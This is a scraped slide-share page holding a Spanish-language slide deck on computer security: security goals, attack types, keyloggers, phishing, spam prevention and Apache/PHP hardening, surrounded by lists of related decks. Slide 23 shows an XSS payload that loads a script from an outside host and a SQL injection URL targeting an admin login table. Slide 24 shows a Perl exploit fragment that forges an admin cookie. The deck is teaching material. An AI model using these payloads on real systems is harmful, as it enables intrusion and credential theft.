Seguridad en la web   no confíes en el usuarioSeguridad en la web   no confíes en el usuario
Seguridad en la web no confíes en el usuarioCarlos Soriano
 
Seguridad Informática Xavier Armijos
Seguridad Informática Xavier ArmijosSeguridad Informática Xavier Armijos
Seguridad Informática Xavier ArmijosXavierArmijosRodrigu
 
Guía de seguridad informatica
Guía de seguridad informaticaGuía de seguridad informatica
Guía de seguridad informaticanico1199
 
Guía teórica seguridad informatica (1)
Guía teórica seguridad informatica (1)Guía teórica seguridad informatica (1)
Guía teórica seguridad informatica (1)lucascen
 

What's hot (20)

Tic protección de datos y equipos
Tic protección de datos y equiposTic protección de datos y equipos
Tic protección de datos y equipos
 
Seguridadinformaticaalexicorrea
SeguridadinformaticaalexicorreaSeguridadinformaticaalexicorrea
Seguridadinformaticaalexicorrea
 
Ayuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtAyuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero Gt
 
Seguridad y Alta Disponibilidad: ataques
Seguridad y Alta Disponibilidad: ataquesSeguridad y Alta Disponibilidad: ataques
Seguridad y Alta Disponibilidad: ataques
 
Protección de equipos, documentos y contraseñas
Protección de equipos, documentos y contraseñasProtección de equipos, documentos y contraseñas
Protección de equipos, documentos y contraseñas
 
Guía de seguridad digital para activistas y defensores
Guía de seguridad digital para activistas y defensoresGuía de seguridad digital para activistas y defensores
Guía de seguridad digital para activistas y defensores
 
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
 
Paty informatica
Paty informaticaPaty informatica
Paty informatica
 
Importancia de la Seguridad Informática
Importancia de la Seguridad InformáticaImportancia de la Seguridad Informática
Importancia de la Seguridad Informática
 
1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataques
 
Paty informatica
Paty informaticaPaty informatica
Paty informatica
 
Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
 
S4 cdsi1
S4 cdsi1S4 cdsi1
S4 cdsi1
 
Cybersecurity
CybersecurityCybersecurity
Cybersecurity
 
S2 cdsi1
S2 cdsi1S2 cdsi1
S2 cdsi1
 
Seguridad en la web no confíes en el usuario
Seguridad en la web   no confíes en el usuarioSeguridad en la web   no confíes en el usuario
Seguridad en la web no confíes en el usuario
 
S3 cdsi1
S3 cdsi1S3 cdsi1
S3 cdsi1
 
Seguridad Informática Xavier Armijos
Seguridad Informática Xavier ArmijosSeguridad Informática Xavier Armijos
Seguridad Informática Xavier Armijos
 
Guía de seguridad informatica
Guía de seguridad informaticaGuía de seguridad informatica
Guía de seguridad informatica
 
Guía teórica seguridad informatica (1)
Guía teórica seguridad informatica (1)Guía teórica seguridad informatica (1)
Guía teórica seguridad informatica (1)
 

Viewers also liked (20)

Rc gustavo salamanca
Rc gustavo salamancaRc gustavo salamanca
Rc gustavo salamanca
 
Pantallas plasmas
Pantallas plasmasPantallas plasmas
Pantallas plasmas
 
Cuestionario
CuestionarioCuestionario
Cuestionario
 
Miele event
Miele eventMiele event
Miele event
 
Presentaciónaudio
PresentaciónaudioPresentaciónaudio
Presentaciónaudio
 
Colegio nicolas esguerra[1][1]
Colegio nicolas esguerra[1][1]Colegio nicolas esguerra[1][1]
Colegio nicolas esguerra[1][1]
 
Normal5ejemplos 120319025218-phpapp01
Normal5ejemplos 120319025218-phpapp01Normal5ejemplos 120319025218-phpapp01
Normal5ejemplos 120319025218-phpapp01
 
Partes del computador
Partes del computadorPartes del computador
Partes del computador
 
ananossa
ananossaananossa
ananossa
 
Trbajo de conceptos basicos
Trbajo de conceptos basicosTrbajo de conceptos basicos
Trbajo de conceptos basicos
 
Diseño arquitectonico
Diseño arquitectonicoDiseño arquitectonico
Diseño arquitectonico
 
psciologia cognitiva
psciologia cognitivapsciologia cognitiva
psciologia cognitiva
 
Los fines y medios
Los fines y mediosLos fines y medios
Los fines y medios
 
Primero a
Primero aPrimero a
Primero a
 
Podcast
PodcastPodcast
Podcast
 
Un juego
Un juegoUn juego
Un juego
 
Turismo religioso
Turismo religiosoTurismo religioso
Turismo religioso
 
Trabajo de emprendimiento
Trabajo de emprendimientoTrabajo de emprendimiento
Trabajo de emprendimiento
 
BBVA en Castilla y León Económica
BBVA en Castilla y León EconómicaBBVA en Castilla y León Económica
BBVA en Castilla y León Económica
 
Grandes protagonistas de la sgm
Grandes protagonistas de la sgmGrandes protagonistas de la sgm
Grandes protagonistas de la sgm
 

Similar to Seguridad informática y de ti

Similar to Seguridad informática y de ti (20)

Capitulo 9
Capitulo 9Capitulo 9
Capitulo 9
 
Seguridad informatica marlon
Seguridad informatica marlonSeguridad informatica marlon
Seguridad informatica marlon
 
Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
 
Aplicaciones Difusas UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
Aplicaciones Difusas  UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1Aplicaciones Difusas  UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
Aplicaciones Difusas UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad de la Información
Seguridad de la InformaciónSeguridad de la Información
Seguridad de la Información
 
Seguridad de la información n
Seguridad de la información nSeguridad de la información n
Seguridad de la información n
 
Seguridad de la Información
Seguridad de la InformaciónSeguridad de la Información
Seguridad de la Información
 
Laura y Marcos | VIRUS
Laura y Marcos | VIRUSLaura y Marcos | VIRUS
Laura y Marcos | VIRUS
 
Seguridad de redes
Seguridad de redes Seguridad de redes
Seguridad de redes
 
Tico
TicoTico
Tico
 
Bryan isaac suriaga
Bryan isaac suriagaBryan isaac suriaga
Bryan isaac suriaga
 
Seguridad inf
Seguridad infSeguridad inf
Seguridad inf
 
Seguridad informatica 2
Seguridad informatica  2Seguridad informatica  2
Seguridad informatica 2
 
Seguridad informatica 2 ximello
Seguridad informatica  2 ximelloSeguridad informatica  2 ximello
Seguridad informatica 2 ximello
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Carlos Miguel Ximello Santiago
Carlos Miguel Ximello SantiagoCarlos Miguel Ximello Santiago
Carlos Miguel Ximello Santiago
 
Seguridad informática
Seguridad informática Seguridad informática
Seguridad informática
 
Impacto computadoras web
Impacto computadoras webImpacto computadoras web
Impacto computadoras web
 

Recently uploaded

PRIMER GRADO SOY LECTOR PART1- MD EDUCATIVO.pdf
PRIMER GRADO SOY LECTOR PART1- MD  EDUCATIVO.pdfPRIMER GRADO SOY LECTOR PART1- MD  EDUCATIVO.pdf
PRIMER GRADO SOY LECTOR PART1- MD EDUCATIVO.pdfGabrieldeJesusLopezG
 
BOCA Y NARIZ (2).pdf....................
BOCA Y NARIZ (2).pdf....................BOCA Y NARIZ (2).pdf....................
BOCA Y NARIZ (2).pdf....................ScarletMedina4
 
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdfMEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdfJosé Hecht
 
historieta materia de ecologías producto
historieta materia de ecologías productohistorieta materia de ecologías producto
historieta materia de ecologías productommartinezmarquez30
 
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxNataliaGonzalez619348
 
Amor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdfAmor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdfAlejandrino Halire Ccahuana
 
PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2
PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2
PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2Eliseo Delgado
 
Apunte de clase Pisos y Revestimientos 1
Apunte de clase Pisos y Revestimientos 1Apunte de clase Pisos y Revestimientos 1
Apunte de clase Pisos y Revestimientos 1Gonella
 
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).hebegris04
 
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...MagalyDacostaPea
 
EJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docx
EJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docxEJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docx
EJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docxFabianValenciaJabo
 
TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)
TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)
TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)jlorentemartos
 
Apunte de clase Pisos y Revestimientos 2
Apunte de clase Pisos y Revestimientos 2Apunte de clase Pisos y Revestimientos 2
Apunte de clase Pisos y Revestimientos 2Gonella
 
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdfNUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdfEDNAMONICARUIZNIETO
 
PROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdf
PROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdfPROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdf
PROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdfMaritza438836
 
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOCUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOEveliaHernandez8
 
Si cuidamos el mundo, tendremos un mundo mejor.
Si cuidamos el mundo, tendremos un mundo mejor.Si cuidamos el mundo, tendremos un mundo mejor.
Si cuidamos el mundo, tendremos un mundo mejor.monthuerta17
 

Recently uploaded (20)

PRIMER GRADO SOY LECTOR PART1- MD EDUCATIVO.pdf
PRIMER GRADO SOY LECTOR PART1- MD  EDUCATIVO.pdfPRIMER GRADO SOY LECTOR PART1- MD  EDUCATIVO.pdf
PRIMER GRADO SOY LECTOR PART1- MD EDUCATIVO.pdf
 
BOCA Y NARIZ (2).pdf....................
BOCA Y NARIZ (2).pdf....................BOCA Y NARIZ (2).pdf....................
BOCA Y NARIZ (2).pdf....................
 
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdfMEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
 
Sesión ¿Amor o egoísmo? Esa es la cuestión
Sesión  ¿Amor o egoísmo? Esa es la cuestiónSesión  ¿Amor o egoísmo? Esa es la cuestión
Sesión ¿Amor o egoísmo? Esa es la cuestión
 
historieta materia de ecologías producto
historieta materia de ecologías productohistorieta materia de ecologías producto
historieta materia de ecologías producto
 
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
 
Amor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdfAmor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdf
 
PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2
PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2
PÉNSUM ENFERMERIA 2024 - ECUGENIUS S.A. V2
 
Acuerdo segundo periodo - Grado Noveno.pptx
Acuerdo segundo periodo - Grado Noveno.pptxAcuerdo segundo periodo - Grado Noveno.pptx
Acuerdo segundo periodo - Grado Noveno.pptx
 
Unidad 2 | Teorías de la Comunicación | MCDIU
Unidad 2 | Teorías de la Comunicación | MCDIUUnidad 2 | Teorías de la Comunicación | MCDIU
Unidad 2 | Teorías de la Comunicación | MCDIU
 
Apunte de clase Pisos y Revestimientos 1
Apunte de clase Pisos y Revestimientos 1Apunte de clase Pisos y Revestimientos 1
Apunte de clase Pisos y Revestimientos 1
 
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
 
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
 
EJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docx
EJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docxEJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docx
EJEMPLO MODELO DE PLAN DE REFUERZO ESCOLAR.docx
 
TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)
TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)
TEMA 13. LOS GOBIERNOS DEMOCRÁTICOS (1982-2018)
 
Apunte de clase Pisos y Revestimientos 2
Apunte de clase Pisos y Revestimientos 2Apunte de clase Pisos y Revestimientos 2
Apunte de clase Pisos y Revestimientos 2
 
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdfNUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdf
 
PROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdf
PROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdfPROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdf
PROGRAMACIÓN CURRICULAR - DPCC- 5°-2024.pdf
 
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOCUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
 
Si cuidamos el mundo, tendremos un mundo mejor.
Si cuidamos el mundo, tendremos un mundo mejor.Si cuidamos el mundo, tendremos un mundo mejor.
Si cuidamos el mundo, tendremos un mundo mejor.
 

Seguridad informática y de ti

  • 2. Seguridad Informática: La seguridad en informática consiste en asegurar que los recursos del sistema de información, como data, servicios o programas de una organización, sean utilizados de la manera que se decidió y que el acceso a la información allí contenida, así como su modificación, sólo sea accesible a las personas que se encuentren acreditadas y dentro de los límites de su autorización.
  • 3. CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA No existe la absoluta seguridad !! Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero también una caja fuerte de titanio. ¿Qué es más seguro: la caja de vidrio o la de titanio? Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla. Todo se puede vulnerar. La única razón por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea más lento.
  • 4. Debemos enfocarnos en REDUCIR EL RIESGO, y no en tratar de eliminar las amenazas, ya que es imposible. Para eso debemos saber de QUE o QUIENES nos protegemos y también COMO nos atacan.
  • 5. “Si te conoces a ti mismo y conoces a tu enemigo, entonces no deberás temer el resultado de mil batallas” Sun-Tzu, El Arte de la Guerra
  • 6. ¿De donde surge la seguridad? • “Tecnológicamente, la seguridad es GRATIS” – YA HAS PAGADO POR ELLA: Los sistemas operativos modernos contienen muchas características de seguridad. ¿Las conoces?¿Las usas? – LAS MEJORES HERRAMIENTAS DE SEGURIDAD SON OPEN SOURCE. (excepto los antivirus)
  • 7. Metas en la seguridad  Integridad: La información sólo puede ser modificada por quien está autorizado y de manera controlada.  Confidencialidad: La información sólo debe ser legible para los autorizados.  Disponibilidad: Debe estar disponible cuando se necesita.  Irrefutabilidad (No repudio): El uso y/o modificación de la información por parte de un usuario debe ser irrefutable, es decir, que el usuario no puede negar dicha acción.
  • 8. Componentes de Seguridad • Seguridad Fisica = Proteger de acceso fisico a personas no autorizadas. • Seguridad Operacional = Medidas de seguridad aplicadas a las operaciones del negocios.(Access c control,autenticazion, backups y disaster recovery) • Seguridad Administrativa = Esta es la parte del triangulo donde se implementan las guias, reglas y procedimientos a nivel administrativo. ( (politicas,requerimientos de software,Etc..)
  • 9. ¿Qué es Vulnerabilidad? • Un agujero de seguridad es un fallo en un programa que permite mediante su explotación violar la seguridad de un sistema informático. • Una vulnerabilidad por lo general permite que el atacante pueda engañar a la aplicación, por ejemplo, esquivando los controles de acceso o ejecutando comandos en el sistema donde se aloja la aplicación. • UNO DE LOS BAKDOORS MAS FAMOSOS LOS TUVO WINDOWS XP Aquí recordaremos aquel agujero de seguridad de Windows a través de los temporales de internet (2007)
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16. Otro ejemplo de vulnerabilidad (no tan relevante, pero igual interesante) Con ustedes el buscaminas
  • 17. Factores que hacen a un sistema más vulnerable  Código sin confirmar - Un código en un diskette, en CD-ROM o USB, se puede ejecutar por la irresponsabilidad o ignorancia del usuario.  Defectos - La mayoría de los sistemas contienen errores que se pueden aprovechar por el malware, mientras no se ponga el parcho correspondiente.  Homogeneidad - Cuando todas las computadoras en una red funcionan con el mismo sistema operativo, si pueden corromper ese SO, podrán afectar cualquier computadora en el que funcione.  Sobre-privilegios del código - La mayoría de los sistemas operativos permiten que el código sea ejecutado por un usuario con todos los derechos.  Sobre-privilegios del usuario - Algunos sistemas permiten que todos los usuarios modifiquen sus estructuras internas.
  • 18. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
  • 19. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Internos - Premeditación (Empleados mal intencionados o ex empleados con información privilegiada) - Descuido - Ignorancia - Indiferencia de las politicas de seguridad Ataques externos -- Hackers, Crackers, Lammers, Script-Kiddies -- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.
  • 20. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Internos • Suplantación de identidad • Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR) • Robo de información (Ej: para la competencia) • Virus, Troyanos, Gusanos • Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc Keylogging - Keycatching Keycatcher:
  • 21. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Externos • Ataques contra servicios WEB • Cross Site Scripting (XSS) • SQL Injection • Exploits • Robo de Identidad • Denegación de Servicio (DoS) y Denegación de Servicio Distribuido (DDoS) • SPAM • VIRUS • Phishing (Whishing, Hishing) • Troyanos
  • 22. XSS SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
  • 23. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB XSS: http://docs.info.apple.com/article.html? artnum=';a=document.createElement('script');a.src='http://h4k.in/i.j s';document.body.appendChild(a);//';alert(1)//%22;alert(2)// %22;alert(3)//--%3E SQL Injection: http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
  • 24. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ejemplo de un exploit en PERL: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host=shift; if ($host eq "") { print "Usage: webeye-xp.pl <host name>n"; exit; } my $browser = LWP::UserAgent->new(); my $resp = $browser->get("http://$host/admin/wg_user- info.ml","Cookie","USER_ID=0; path=/;"); $t = $resp->content; #print $t; ";
  • 25. Algo breve sobre Cookies Las cookies son pequeños archivos de texto que el navegador almacena en el ordenador del usuario, cuando se visitan páginas Web. • Las cookies almacenan información que se utiliza con varios fines: • Para personalizar la página Web y su navegación para cada usuario. • Para recoger información demográfica sobre cuántos usuarios visitan la página y su tiempo de estancia en ella. • Para realizar un seguimiento de qué banners se muestran al usuario, y durante cuánto tiempo. • Estos usos no tienen un carácter malicioso, al menos en principio. Sin embargo, es necesario tener en cuenta que toda información personal que se introduzca en una página Web se puede almacenar en una cookie, incluyendo el número de la tarjeta de crédito. • Además, las cookies también se pueden utilizar para formar un perfil del usuario, con información que éste no controla, y que después puede ser enviada a terceros, con la consiguiente amenaza para la privacidad.
  • 26. Y ya hablamos de exploit, hablemos de: El Script boy o Script Kiddie Definición. Persona que presume de ser un hacker o cracker sin que posea un grado de conocimientos suficientes. Usa normalmente cracks, exploits y programas similares construidos por personas con grandes conocimientos pero cuyo uso está al alcance de cualquiera. Para ahora recordar los exploits, como antaño
  • 27.
  • 28.
  • 29.
  • 30.
  • 32.
  • 33. El delito ya esta cometido ahora el atacante revisa su correo, el que uso para recibir la contraseña de la victima
  • 34.
  • 35. Contraseña e IP
  • 36. Esta fue una de las maneras más usadas para obtener la contraseña de otra persona de las muchas maneras que se pueden usar como: KEYLOGERS programas que capturan todo lo que se hace por el teclado O algunas personas aprovechan las vulnerabilidades de Windows y los Agujeros de seguridad para obtener la ansiada contraseña por ejemplo Desencriptar el registro de Windows para abrir un cookie
  • 37. Brevemente: Los Keylogger Programa que intercepta todas las pulsaciones realizadas en el teclado (e incluso a veces también el Mouse), y las guarda en un archivo para obtener datos sensibles como contraseñas, etc. Este archivo puede ser enviado por un troyano a un usuario de PC, vía mail, chat o descargando un archivo exe.
  • 38. Brevemente: El Spyware • Los programas espía, también conocidos como spyware, son aplicaciones informáticas que recopilan información personal del usuario sin su consentimiento, como por ejemplo software presente en el ordenador, hábitos de uso de Internet, páginas visitadas, etc. Posteriormente, transmiten esta información a terceros, tales como empresas de publicidad u otras compañías interesadas en dichos datos, con la consiguiente violación de la privacidad. • Los programas espía llegan al ordenador a través de distintas vías: mediante un troyano, que los instala sin consentimiento del usuario; cuando se visita una página Web que incluye determinados controles ActiveX o código que explota una determinada vulnerabilidad. • Además de las acciones descritas, el spyware tiene una serie de efectos colaterales: consume recursos del sistema, ralentiza el funcionamiento del ordenador, causa fallos en el sistema, etc.
  • 39. Y más brevemente: Los backdoors • (Puerta trasera) Defecto en un software o página Web que permite ingresar a una determinada parte de los mismos que usualmente está restringida a un usuario ajeno. No siempre es un defecto (bug), también puede ser una entrada secreta de los programadores o webmasters con diversos fines. Ej.: una página Web tiene clave de acceso para ingresar, pero existe una determinada dirección que nos permite entrar saltando la misma. Uno de los más usados es Back Orifice creado específicamente para entrar en sistemas operativos Windows usando troyanos.
  • 40. Y super breve: El Phishing • El phishing consiste en el envío de correos electrónicos que, aparentando provenir de fuentes fiables (por ejemplo, entidades bancarias), intentan obtener datos confidenciales del usuario. Para ello, suelen incluir un enlace que, al ser pulsado, lleva a páginas Web falsificadas. De esta manera, el usuario, creyendo estar en un sitio de toda confianza, introduce la información solicitada que, en realidad, va a parar a manos del estafador.
  • 41. En este ejemplo, el propio correo incluye un formulario en lugar de ofrecer un enlace a una página falsa. Si el usuario introduce sus datos y envía el formulario, estos son finalmente recogidos en un servidor ubicado en Taiwán.
  • 42. Y QUE HAY DEL SPAM 72% del correo electrónico mundial es Spam Fuente:Ironport, 2010. Objetivos: ▪ Ganar Notoriedad • Dañar empresas internacionales • Recolectar datos (ratware, pictionary, spiders, crawlers) • Cometer delitos (spoofing, pishing, etc.) • Publicidad pagada por el usuarios y a costo mínimo para el emisor Beneficios: • De tipo económico * Contratados por empresas * Venta de datos • Reconocimiento ¿POR QUÉ EXISTE? ES UN NEGOCIO QUE GENERA PUBLICIDAD Y BENEFICIOS ECONÓMICOS CASI SIN COSTO ¡¡¡¡UN SPAMMER PUEDE GANAR 8000 USD POR DÍA!!!! Fuente: Reporte Resultados Reunión Busan, Task Force on Spam OECD, Septiembre 2010.
  • 43. CONSECUENCIAS DEL SPAM GENERA IMPORTANTES COSTOS • Daña la productividad • Daña la competitividad de las empresas * Tiempo de entrega y respuesta * Confiabilidad Uso inútil de banda ancha Daño a la infraestructura informática Denegación servicio por saturación Transmisión de virus y gusanos • Juicios Pérdida de recursos por los que paga (saturación) A Usuarios Paga publicidad que no solicito Pérdida de información por combate (sobrefiltrado) Traslado de costos de combate por ISPs Costos por Ancho de Banda A ISPs Costos por inversión en herramientas para su combate Costos en imagen IMPLICACIÓN DEL SPAM EN LAS TELECOMUNICACIONES Existe un daño con respecto a la operación segura de las redes públicas de telecomunicaciones y al uso eficiente de su capacidad y recursos para su mejor aprovechamiento, logrando servicios de telecomunicaciones de calidad, en beneficio de los usuarios
  • 44. PREVENCIÓN •No abras y elimina todo mensaje cuyo título o emisor (personas o empresas) te resulte sospechoso o desconocido; •Sé cuidadoso al abrir los archivos adjuntos, pueden contener virus que se activan al abrirlos; •Instala un firewall y un antivirus. Actualízalos frecuentemente; •Instala un filtro de Spam o suscríbete al de tu prestador de servicios de internet; •Utiliza diversas direcciones de correo, por ejemplo, una cuenta de trabajo y una cuenta personal solo para mensajes a personas confiables y conocidas; •Si te es solicitada información confidencial mediante mensaje aparente de tu banco o compañía crediticia, verifica su veracidad por teléfono. •Si envías mensajes a un gran número de destinatarios, usa el campo de copia ciega BCC, de esta forma las direcciones no son visibles a otros; •Usa un programa de encriptación para tus mensajes, así aseguras que el contenido sólo sea visto por el destinatario; •No compres, ni respondas a mensajes comerciales de empresas dudosas. No respondas solicitando tu eliminación de la lista, con ello aseguras al spammer la validez de tu cuenta de correo, lo que llevará a que aparezca en más listas y bases de datos; •No respondas a cadenas o a reportes de falso virus (hoax), ni atiendas a sus solicitudes de reenvío. Estos reportes te impulsan a tomar supuestas medidas contra el virus, que en realidad te llevarán a provocar daños a tu equipo; •Verifica siempre la necesidad e identifica la identidad real del destinatario cuando proporciones tu información confidencial vía Internet o e-mail; •Considera siempre a quién proporcionas tus datos de contacto, tales como dirección de correo electrónico o número celular, previniendo quién podría tener acceso a él después.
  • 46. LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD  Siempre respetar las políticas de seguridad  Siempre tener nuestros servicios actualizados a la última versión conocida estable  Utilizar mecanismos de criptografía para almacenar y transmitir datos sensibles  Cambiar las claves cada cierto tiempo  Auto-auditar nuestros propios servicios. Autoatacarnos para saber si somos o no vulnerables  Estar siempre alerta. Nunca pensar ”a nosotros nadie nos ataca”.  No dejar respaldos con información sensible en directorios web  No usar las mismas claves para servicios distintos (ej, la clave de root sea la misma que la de MySQL)
  • 47. SERVICIOS DE INTERNET - Cambiar los puertos por defecto - Garantizar el acceso solo a cuentas específicas - Aplicar técnicas de Hardening - Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas) en Internet y redes no seguras - Eliminar todos los banners posibles y sobre todo las versiones - Habilitar módulos de seguridad (Ej mod_security en Apache) - Levantar Firewalls e IDS/IPS - Crear cuentas de sistema restringidas (aunque no tengan privilegios)
  • 48. SERVICIOS DE INTERNET - Nunca trabajar con ”root” si no es estrictamente necesario - Proteger con doble contraseña si es posible - Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y caracteres especiales. Las claves no deben ser palabras coherentes (ej: Admin25) - Cerrar puertos y eliminar aplicaciones innecesarias - Borrar robots.txt y estadísticas públicas - Proteger las URL (ej: mod_rewrite)
  • 49. SERVICIOS DE INTERNET - Tener cuidado con los archivos temporales en directorios WEB. Ejemplo: index.php~ (terminados en caracter “squiggle” o “pigtail (literalmente: cola de chancho)” - Realizar respaldos periódicamente y probar que funcionen - Conocer las técnicas de ataque más conocidas - Auditar los códigos con herramientas de seguridad - Si ejecutan algún servidor de base de datos, permitir solamente comunicación con interfaz loopback y no dejar sin contraseña las bases de datos. - En lo posible no utilizar servicios como: - WEBMIN - phpMyAdmin - Interfaces WEB en routers o dispositivos de red
  • 50. UN POCO MAS DE SEGURIDAD CON APACHE Y PHP Apache. En httpd.conf activar las siguientes directivas: ServerTokens Prod ServerSignature Off ServerAdmin <direccion@decorreo.com> habilitar mod_security y mod_rewrite PHP .En php.ini php_expose=off “esconde php” mode_safe=on evita que se ejecuten funciones como system(), passthru(), exec(), etc. evitar scripts con phpinfo();
